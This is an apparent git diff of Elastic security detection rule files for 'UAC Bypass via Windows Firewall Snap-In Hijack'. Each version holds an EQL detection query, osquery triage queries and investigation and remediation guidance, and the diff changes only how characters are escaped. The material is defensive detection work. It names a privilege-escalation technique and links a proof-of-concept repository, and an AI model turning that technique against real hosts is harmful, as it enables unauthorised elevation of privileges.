- Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name == \"mmc.exe\" and\n /* process.Ext.token.integrity_level_name == \"high\" can be added in future for tuning */\n /* args of the Windows Firewall SnapIn */\n process.parent.args == \"WF.msc\" and process.name != \"WerFault.exe\"\n", "references": [ "https://github.com/AzAgarampur/byeintegrity-uac" @@ -58,7 +58,7 @@ ], "risk_score": 47, "rule_id": "1178ae09-5aff-460a-9f2f-455cd0ac4d8e", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/1178ae09-5aff-460a-9f2f-455cd0ac4d8e_106.json b/packages/security_detection_engine/kibana/security_rule/1178ae09-5aff-460a-9f2f-455cd0ac4d8e_106.json index b51c082e532..2d761b508db 100644 --- a/packages/security_detection_engine/kibana/security_rule/1178ae09-5aff-460a-9f2f-455cd0ac4d8e_106.json +++ b/packages/security_detection_engine/kibana/security_rule/1178ae09-5aff-460a-9f2f-455cd0ac4d8e_106.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "UAC Bypass via Windows Firewall Snap-In Hijack", - "note": "## Triage and analysis\n\n### Investigating UAC Bypass via Windows Firewall Snap-In Hijack\n\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as low to high integrity levels) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. UAC can deny an operation under high-integrity enforcement, or allow the user to perform the action if they are in the local administrators group and enter an administrator password when prompted.\n\nFor more information about the UAC and how it works, check the [official Microsoft docs page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works).\n\nThis rule identifies attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in. Attackers bypass UAC to stealthily execute code with elevated permissions.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze any suspicious spawned processes using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating UAC Bypass via Windows Firewall Snap-In Hijack\n\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as low to high integrity levels) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. UAC can deny an operation under high-integrity enforcement, or allow the user to perform the action if they are in the local administrators group and enter an administrator password when prompted.\n\nFor more information about the UAC and how it works, check the [official Microsoft docs page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works).\n\nThis rule identifies attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in. Attackers bypass UAC to stealthily execute code with elevated permissions.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze any suspicious spawned processes using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name == \"mmc.exe\" and\n /* process.Ext.token.integrity_level_name == \"high\" can be added in future for tuning */\n /* args of the Windows Firewall SnapIn */\n process.parent.args == \"WF.msc\" and process.name != \"WerFault.exe\"\n", "references": [ "https://github.com/AzAgarampur/byeintegrity-uac" @@ -58,7 +58,7 @@ ], "risk_score": 47, "rule_id": "1178ae09-5aff-460a-9f2f-455cd0ac4d8e", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/1178ae09-5aff-460a-9f2f-455cd0ac4d8e_107.json b/packages/security_detection_engine/kibana/security_rule/1178ae09-5aff-460a-9f2f-455cd0ac4d8e_107.json index 9296bbdd4ce..c5137dfed89 100644 --- a/packages/security_detection_engine/kibana/security_rule/1178ae09-5aff-460a-9f2f-455cd0ac4d8e_107.json +++ b/packages/security_detection_engine/kibana/security_rule/1178ae09-5aff-460a-9f2f-455cd0ac4d8e_107.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "UAC Bypass via Windows Firewall Snap-In Hijack", - "note": "## Triage and analysis\n\n### Investigating UAC Bypass via Windows Firewall Snap-In Hijack\n\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as low to high integrity levels) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. UAC can deny an operation under high-integrity enforcement, or allow the user to perform the action if they are in the local administrators group and enter an administrator password when prompted.\n\nFor more information about the UAC and how it works, check the [official Microsoft docs page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works).\n\nThis rule identifies attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in. Attackers bypass UAC to stealthily execute code with elevated permissions.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze any suspicious spawned processes using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating UAC Bypass via Windows Firewall Snap-In Hijack\n\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as low to high integrity levels) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. UAC can deny an operation under high-integrity enforcement, or allow the user to perform the action if they are in the local administrators group and enter an administrator password when prompted.\n\nFor more information about the UAC and how it works, check the [official Microsoft docs page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works).\n\nThis rule identifies attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in. Attackers bypass UAC to stealthily execute code with elevated permissions.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze any suspicious spawned processes using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name == \"mmc.exe\" and\n /* process.Ext.token.integrity_level_name == \"high\" can be added in future for tuning */\n /* args of the Windows Firewall SnapIn */\n process.parent.args == \"WF.msc\" and process.name != \"WerFault.exe\"\n", "references": [ "https://github.com/AzAgarampur/byeintegrity-uac" @@ -58,7 +58,7 @@ ], "risk_score": 47, "rule_id": "1178ae09-5aff-460a-9f2f-455cd0ac4d8e", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/1178ae09-5aff-460a-9f2f-455cd0ac4d8e_108.json b/packages/security_detection_engine/kibana/security_rule/1178ae09-5aff-460a-9f2f-455cd0ac4d8e_108.json index d01ac0b5c17..dff98cd063a 100644 --- a/packages/security_detection_engine/kibana/security_rule/1178ae09-5aff-460a-9f2f-455cd0ac4d8e_108.json +++ b/packages/security_detection_engine/kibana/security_rule/1178ae09-5aff-460a-9f2f-455cd0ac4d8e_108.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "UAC Bypass via Windows Firewall Snap-In Hijack", - "note": "## Triage and analysis\n\n### Investigating UAC Bypass via Windows Firewall Snap-In Hijack\n\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as low to high integrity levels) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. UAC can deny an operation under high-integrity enforcement, or allow the user to perform the action if they are in the local administrators group and enter an administrator password when prompted.\n\nFor more information about the UAC and how it works, check the [official Microsoft docs page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works).\n\nThis rule identifies attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in. Attackers bypass UAC to stealthily execute code with elevated permissions.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze any suspicious spawned processes using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating UAC Bypass via Windows Firewall Snap-In Hijack\n\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as low to high integrity levels) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. UAC can deny an operation under high-integrity enforcement, or allow the user to perform the action if they are in the local administrators group and enter an administrator password when prompted.\n\nFor more information about the UAC and how it works, check the [official Microsoft docs page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works).\n\nThis rule identifies attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in. Attackers bypass UAC to stealthily execute code with elevated permissions.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze any suspicious spawned processes using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned 